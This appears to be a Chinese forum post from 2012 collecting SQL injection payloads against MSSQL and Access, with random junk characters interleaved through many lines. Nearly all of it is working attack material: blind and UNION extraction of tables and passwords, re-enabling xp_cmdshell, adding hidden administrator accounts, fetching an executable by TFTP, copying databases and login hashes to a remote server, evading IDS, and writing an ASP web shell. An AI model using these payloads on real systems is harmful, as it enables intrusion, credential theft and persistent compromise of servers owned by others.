1..判断有无注入点
. h$ S) Q5 ^8 N& v& v0 C7 L2 e; and 1=1 and 1=2
, K$ V0 J+ I+ j. @' L1 N( j- H. T
- n( t1 z/ d; z! A1 o2 c: b7 B, A) t7 t
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. " @+ w- V; O. f: c! }: s9 B5 t& F$ y
and 0<>(select count(*) from *) " E- ?- w* W" a `* l5 p) t7 |
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 u! p. a( y' K+ |) a1 P
: Z# A& ?' F* q7 Y; @! M1 `" H. j2 g
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 8 \# H3 \- {6 b# K
and 0<(select count(*) from admin) 8 O- G$ _# \! x, Q# L v
and 1<(select count(*) from admin)
% c' p$ y6 T! h猜列名还有 and (select count(列名) from 表名)>0# p: i |7 B3 i$ H1 n4 f+ h
3 c. [0 D4 T* a; `
2 _5 r# q. t( w$ G& O% S# ?9 B0 ?3 Y/ d4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
! m/ Q: ?) j/ ^0 Iand 1=(select count(*) from admin where len(*)>0)--
, X- {) ?8 A" H* land 1=(select count(*) from admin where len(用户字段名称name)>0)
. H, J) B! p/ W' B# land 1=(select count(*) from admin where len(密码字段名称password)>0) ) M4 k1 t# C2 x1 `- \6 m3 m
: y* A3 c( h' u5 C2 T2 G8 s
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 6 K% e1 D9 ~# D3 w: E, T/ D2 \
and 1=(select count(*) from admin where len(*)>0)
1 D9 a: I2 G$ Q- Land 1=(select count(*) from admin where len(name)>6) 错误 8 s& N/ c* H3 q! i2 U: P* x; |
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 4 e, A9 N& a, L+ v3 O- z
and 1=(select count(*) from admin where len(name)=6) 正确
2 }1 y6 a8 t/ B; t; P" Q$ o; }8 c" w0 Q5 c2 N$ w( |; Q
and 1=(select count(*) from admin where len(password)>11) 正确 + j3 D, {8 M1 k; m- O9 @7 _
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
0 t* W; S- l D, Tand 1=(select count(*) from admin where len(password)=12) 正确 / P$ H" X/ \& H/ ?5 j, w
猜长度还有 and (select top 1 len(username) from admin)>5) h! H7 F9 R8 i! @) `' R
u) H7 G: N! b0 K# F' H0 }
( B7 n- _' R X B Q
6.猜解字符 4 M2 }5 K, _1 t9 c
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
% j* Z) @# f: }& _/ f" ~$ oand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 9 e4 r9 z4 M) e4 a, }! C h! G9 k
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
0 D* F Y M4 H
! D' u6 q( ]6 s9 t" P( [, R猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算' V, m% o- l3 v; S6 W
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- ; F( @" Z9 G3 q0 [
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
6 K( Y) J/ P( v8 Q0 s
7 N* H8 b" ^9 n# ^! @: v: G" Ygroup by users.id having 1=1--
, p, {. W# Q# Zgroup by users.id, users.username, users.password, users.privs having 1=1--
( j# _5 e, ~* D2 D" U& S; insert into users values( 666, attacker, foobar, 0xffff )--
: ?" S" [5 p0 e9 f
' [. E0 g# x- R R G) H* c kUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- ' q7 N8 J# Q) z p( I( e& E9 X. \
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- " V# i0 t! T& g/ Y9 B K
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
& {1 r: c$ {, c" Z* CUNION SELECT TOP 1 login_name FROM logintable- 2 @7 {) B) f& _+ ^0 ~4 }2 @2 \: l
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
, v" t2 q* A1 Q1 N
* S8 N, Y2 s" U1 Z; |看服务器打的补丁=出错了打了SP4补丁
5 q% Z6 k, y& F$ V7 uand 1=(select @@VERSION)-- ! X( {3 H5 l* D% F; a
$ d7 x& y- r% J# p1 j
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
5 K1 P6 ?- P" S0 F% P3 L, V1 nand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
+ |7 V3 p5 ?" r' e, I
( w- _% Q* k8 O' g判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
1 @8 v1 M7 i) qand sa=(SELECT System_user)--
. z- c# P( K1 y5 D1 P( Uand user_name()=dbo--
8 k8 y+ w/ y' V& tand 0<>(select user_name()-- : v6 T0 m$ N3 G; i1 A. \ Q
Y0 |6 W# o. J0 {看xp_cmdshell是否删除 . p( q6 ]: A! L
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
* {! n! d; c; [ c6 i! q0 ]+ v3 w% M- Q/ L* Y: S9 Q A
xp_cmdshell被删除,恢复,支持绝对路径的恢复 1 r7 m' v4 u- [/ T1 v
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- ; G5 J) E1 ~6 [0 t
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
) b& `' k: o3 @- m/ T5 ?9 @
u& j# [1 C8 c* o9 y) P反向PING自己实验 0 r. A" a; o6 e4 `& O4 o8 |3 }
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- % B/ u! O) J( v9 F' M! ]5 ?
. M3 n7 @# \( W& G; @" j加帐号 3 t' u' G3 e4 Y
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
5 i; `1 i& p( V0 f# z' J6 P! E& X% ?& t
创建一个虚拟目录E盘:
' c7 {4 B% @. ?) l2 g6 g;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
' {! B5 c2 d9 L6 K2 ~( t
, s& u8 _% K; z% a访问属性:(配合写入一个webshell)
- B2 M+ a' C- K. P# O6 mdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
( N$ T# Z4 H4 u9 q- G
5 X+ t6 Z* R9 h& N+ a8 ~) Q
& c! C5 _5 L, W U# S0 k( D( b% i* WMSSQL也可以用联合查询
! @0 S4 P! e) E' ]/ p/ F9 y$ {?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
% D/ ?. B, w3 P, b+ J?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
|5 k0 N k1 y0 e% ^# U( I* m0 V/ @; [
# j2 c2 J5 ^: @7 i爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 J! U1 n5 C# O* e/ O/ C- b& k
' g; R6 ^0 T* ~0 e5 }
7 Z. k) w$ x* {. y: w" V6 B
1 Z1 \+ x; q# r: S. ]) I \ j* m得到WEB路径
3 \- I- n- W4 ?;create table [dbo].[swap] ([swappass][char](255));-- ' Q! |/ E# s# j _9 A% J6 g
and (select top 1 swappass from swap)=1-- 7 K5 X l# o# {9 k
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
; R% G& J# _8 ?" @# p2 o. v;use ku1;-- * k# ]8 d' j- Q$ M
;create table cmd (str image);-- 建立image类型的表cmd 5 C9 L2 a) o: Q. x" [2 M6 p) R& E$ T# p, c
! W4 _- m D' U T9 p( ~% ?
存在xp_cmdshell的测试过程:
6 G9 n) a7 H3 ?$ \6 H, r6 {;exec master..xp_cmdshell dir
D9 a; o: q" D% S;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 # o* Y% m2 Q' L9 l' k8 @6 j
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
4 |$ K& R: n# o6 f& f3 h;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 1 W1 W+ j X3 F: V: z/ a: y D: Z( I4 b
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- ; X% y$ K0 P o, |5 T3 W0 U' \
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- ! |" Q( C6 J, `8 i
exec master..xp_servicecontrol start, schedule 启动服务 ) E) V! L' ~% N' r$ X) Y& N
exec master..xp_servicecontrol start, server 0 G$ [% n; |( q; \8 A6 |; u$ V! j0 M
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add ) }$ z# p1 n$ V; l K
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
! M6 n4 n' i% X$ V8 [, w: W. t9 U" @; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 1 C; L0 V9 A6 A5 z3 h" Q& V P/ d
0 @4 L, u/ f( F1 t) ~5 y;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ " {' w) T/ z) v1 ^. v0 _
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
. [8 P8 ^3 Q2 l4 r' A7 v5 };declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
, t5 s* L. H1 s$ [8 l% w8 X如果被限制则可以。 5 n9 I+ j) [/ \* b0 J
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) 1 u- C5 m. W- J0 \$ Z
' U' R# S9 u" V) T5 a( Q2 g
查询构造: - s: ]& e5 p6 K! f% X" @* m. K
SELECT * FROM news WHERE id=... AND topic=... AND .....
( X$ M9 D& S( k* O$ Jadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 3 g ?7 J& {+ i
select 123;--
: b6 U# x" {* s) h;use master;--
9 D( j4 J! V- E# T W+ ~:a or name like fff%;-- 显示有一个叫ffff的用户哈。
0 w6 z) p0 N8 z1 {; }0 ~and 1<>(select count(email) from [user]);--
% a: q2 }" B) u6 }$ Z1 l;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- 4 a* d& Y; w3 C5 ]0 h. r
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- 5 n+ [& a2 B2 T# z$ R3 ?
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
2 Y3 O Q; y8 w6 J! Z- K2 O3 q* _;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
8 a& `) z+ A$ s4 z2 D8 A1 K) c;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
A2 s4 ]2 K/ {;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- + C) l& b4 @+ W% _& p T' ^
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 ' d! a* g4 ^: }) P- P3 ^
通过查看ffff的用户资料可得第一个用表叫ad ' U7 D0 O5 P7 }1 w6 H3 T
然后根据表名ad得到这个表的ID 得到第二个表的名字 : i3 Z9 |' f$ \- `" j7 E
! r' A) ^% H, i& r% y, z; [( w6 Ginsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- & v' }+ w- F6 T9 m6 i9 o8 q9 x
insert into users values( 667,123,123,0xffff)-- ! E% ]+ A2 s& a0 {# |
insert into users values ( 123, admin--, password, 0xffff)-- , p7 @3 U0 J1 B7 Z5 v
;and user>0
5 f" ~8 n1 D( l8 v5 T7 w$ o6 q;and (select count(*) from sysobjects)>0
0 x1 H% r' Y* E* [" r6 H;and (select count(*) from mysysobjects)>0 //为access数据库 + G+ |3 O2 V; y5 ~; k
& M+ T, v# f! n0 J! I( R4 Q! Y3 @/ U枚举出数据表名
/ A0 M$ B% K4 ~;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
4 I5 o3 Z6 B5 ^9 y# c3 K这是将第一个表名更新到aaa的字段处。 5 y8 Z6 S0 Y% n T
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
1 }. \. o7 f1 \4 D# X3 @$ b$ V, J! N;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- " w) M3 C' o( F4 `
然后id=1552 and exists(select * from aaa where aaa>5) * z$ {+ R( z& l: g; ^5 g3 }( D* m
读出第二个表,一个个的读出,直到没有为止。 2 l/ H% \) G, \$ v6 N$ k
读字段是这样: ) p& F& s% L V7 y1 i$ S
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- / |" @+ |/ x7 A1 G8 i) `$ Y
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
$ k6 S. B5 ?, p& `; w7 E;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
* s9 X0 P0 y/ b# \然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
' ?( J7 ?. G t1 }. x- E
: G5 ?6 R2 t! w! E2 _ L: M- f! g[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
% F' f7 E$ n/ G. {update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
- \1 }% }! j2 l% [+ d通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] & q. }1 n$ T3 M J2 c9 Y
+ J5 S2 v0 Z4 I! w- G) o* u( @[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
5 ~: {8 P6 E0 g" n7 [update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
* T8 P9 D) e5 o# L/ U# k* J% M$ Q7 k0 R' ]* n) i. v+ E' M' I
绕过IDS的检测[使用变量] ( x0 G" F. {' \" u. o
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ * N5 a, ~1 m9 ?% Z9 m' f) U
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
& m) |. V& b/ T8 L8 K9 W$ }# Y2 _2 a9 f, ~! N& |( Z
1、 开启远程数据库 ) [$ ^5 Y2 {$ K( a5 z
基本语法 0 f& F( y4 P3 e( J
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
8 K, C3 l6 x; ?4 A7 v/ h( B参数: (1) OLEDB Provider name
3 O. g" ^6 Y5 T3 r* k2、 其中连接字符串参数可以是任何端口用来连接,比如 0 ~2 K2 W5 M4 o6 \
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table % [# ~' M6 }/ n" n2 I9 Q
3.复制目标主机的整个数据库insert所有远程表到本地表。
) E9 M4 x$ L& Y5 o# M% o
% t- ~6 i$ }6 m' A' e基本语法: ' i3 W4 h% j) b" [# O
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 , j7 D: Z' l6 u3 o
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
# I; }: a) V. h2 k4 L2 Minsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 5 W% G# f! |% t
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) 7 _$ `& a0 D/ Y2 o3 F
select * from master.dbo.sysdatabases
5 v# x. m; @; a$ Vinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) ) ]9 D- h% \& {3 I! n; U% c
select * from user_database.dbo.sysobjects ( J/ r2 Z+ u+ y: l) n/ ?, H4 b
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) ( x* k! Y& q1 q
select * from user_database.dbo.syscolumns
6 L: f* t5 v- l* X- L: s1 r复制数据库:
$ ]0 M: n; x y& n ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 & o( i* P) e9 k# r
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
( T% R% z8 h: ?: f3 T. r& g4 @% S$ e7 a% Q, u
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: 4 e/ s2 _, X* K, V+ e; z
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
) _# c0 @* ?3 u( s; h, Y得到hash之后,就可以进行暴力破解。 * ^4 ^% r% N# \; Z# T5 L" ?/ |. b
% p2 G+ D& l6 i2 ?7 ^0 y遍历目录的方法: 先创建一个临时表:temp
) ^6 G# Q3 X& j- J! R1 B* O;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- , k) ^8 N# H' b% B
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 0 E9 F5 M& V. L z6 M; R7 x+ l, j- n
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 ; g- a- p$ G' P' u" q
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
" x/ ~8 x3 j7 @1 R/ `9 p;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 ]$ z9 a) n9 @) S) D8 v0 i! w4 e
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
+ w2 F9 m# [2 z. P+ z;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- 9 M" b- B* R0 n4 p q# Z
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
& M( ^+ K3 C$ ^' L;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) ! B* C6 f, D' W/ F# b# H
写入表:
) Y- G0 {, E' }语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- 2 T* L" \0 U# k8 n
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- D4 ~5 o4 F) j' ~$ ?- F
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
4 d* P* i8 Y6 e( q M# v% N t8 ?语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 5 o8 J: ]8 Y1 E: w2 k$ o
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 9 D. Q. @, [4 {% o* D
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- - I9 _* a0 }0 l! |
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
: X Y$ U0 P4 L4 W( V5 n0 ?语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
- _! i: c% T$ q6 L5 S: G: Z语句9:and 1=(SELECT IS_MEMBER(db_owner));-- ( |+ H0 C+ J( h+ c* W# |, t
( j4 E* e% j, g m. ]; q2 j把路径写到表中去: $ L/ Q6 }; V2 S/ X9 X0 f |
;create table dirs(paths varchar(100), id int)--
+ V8 T2 v; ?2 F! k) Q+ U7 g;insert dirs exec master.dbo.xp_dirtree c:\-- ! H1 w0 u4 R+ {
and 0<>(select top 1 paths from dirs)--
2 a* O, D; l0 H5 \0 e' S, M9 ^) Dand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- % q* O' L' X: R% F5 `+ u: X3 Q
;create table dirs1(paths varchar(100), id int)--
/ w7 [8 I) v* P7 ]9 y2 B7 T$ U;insert dirs exec master.dbo.xp_dirtree e:\web-- 0 B3 K2 p' g) M; [' I+ M6 j
and 0<>(select top 1 paths from dirs1)-- $ u& L6 {$ ]& u. k; U' H
! J1 s8 s$ u, D$ F8 r( s) l
把数据库备份到网页目录:下载 1 u4 K0 \5 V( `
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- + A6 b4 |$ A4 ]4 a) {
4 Y' c/ z0 T% B, J: r' {# [and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
5 ]: r. a$ b M% \% O! @ \and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 6 ~2 T2 V r) o$ L
and 1=(select user_id from USER_LOGIN)
8 }) M# i) j; ?and 0=(select user from USER_LOGIN where user>1)
t2 N2 U' v5 F' f4 S+ T0 p7 Q# u- K/ Y5 L' D/ y( e' f7 n) n6 i
-=- wscript.shell example -=-
% J) ?1 y+ b' h, F2 V1 J% |5 x6 S1 jdeclare @o int 9 q% P6 l* r! M1 l0 p! Y
exec sp_oacreate wscript.shell, @o out
- M% S& V0 b5 j% eexec sp_oamethod @o, run, NULL, notepad.exe . }/ P7 w2 T |& N$ z- V
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
% J+ A% H, |- t5 I3 `; p
" K0 L- c2 C2 m' z( _3 Ldeclare @o int, @f int, @t int, @ret int 2 q* `$ w4 T8 F, o3 u `: A
declare @line varchar(8000)
( x ~( u; L9 K1 b dexec sp_oacreate scripting.filesystemobject, @o out
" n9 x9 A; e7 D! g* a! s h/ w8 aexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
$ A5 S1 l" v2 Bexec @ret = sp_oamethod @f, readline, @line out 2 H' W! L5 y0 v$ f
while( @ret = 0 ) . x7 f, @4 V+ C% V$ Z
begin
! b) ]" A- v! V, oprint @line M9 }$ _, S6 E5 A Z) a" j- Z* L
exec @ret = sp_oamethod @f, readline, @line out
4 n6 o7 Q3 M0 Uend
3 T3 s% n! L. A) d i4 m: `7 ^4 |7 P
declare @o int, @f int, @t int, @ret int 0 @$ I* @& l/ T* k
exec sp_oacreate scripting.filesystemobject, @o out & X1 Y- b, `9 O5 x/ Y3 Z3 l$ k: o
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 ( d ?9 t( O+ B- e, H- F
exec @ret = sp_oamethod @f, writeline, NULL,
4 N) I" m" ?0 y! R1 a9 K<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %> . v$ P" _9 n: o& M, `! |3 k
, `/ u$ }. `" ?( Ndeclare @o int, @ret int ( d- P- x& q& N5 X: R. g8 J
exec sp_oacreate speech.voicetext, @o out 7 g7 A- B( V# B, f
exec sp_oamethod @o, register, NULL, foo, bar
0 {# w" z3 U( Q% \1 o/ r# }5 a Lexec sp_oasetproperty @o, speed, 150
9 S; s- G$ p, }1 `% H) [" X( N1 }- wexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
: K m1 N \5 s6 rwaitfor delay 00:00:05
* p5 ]( Z% g, W: v$ r- S6 c+ b# c4 q e
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
; y) R& E, x% G9 ]5 J& Q" Z" w4 p
, v P9 ~9 \- c- a4 V- |xp_dirtree适用权限PUBLIC , p P) y3 l% Q
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
9 L: P2 ?5 _: S8 `- Icreate table dirs(paths varchar(100), id int)
( J* Q4 ~5 A8 Z! W. p建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 \5 [! j6 ?4 d/ ^
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!) K* g" Z; `: x, [
|
发表于 2012-9-15 14:32:40
收藏
支持
反对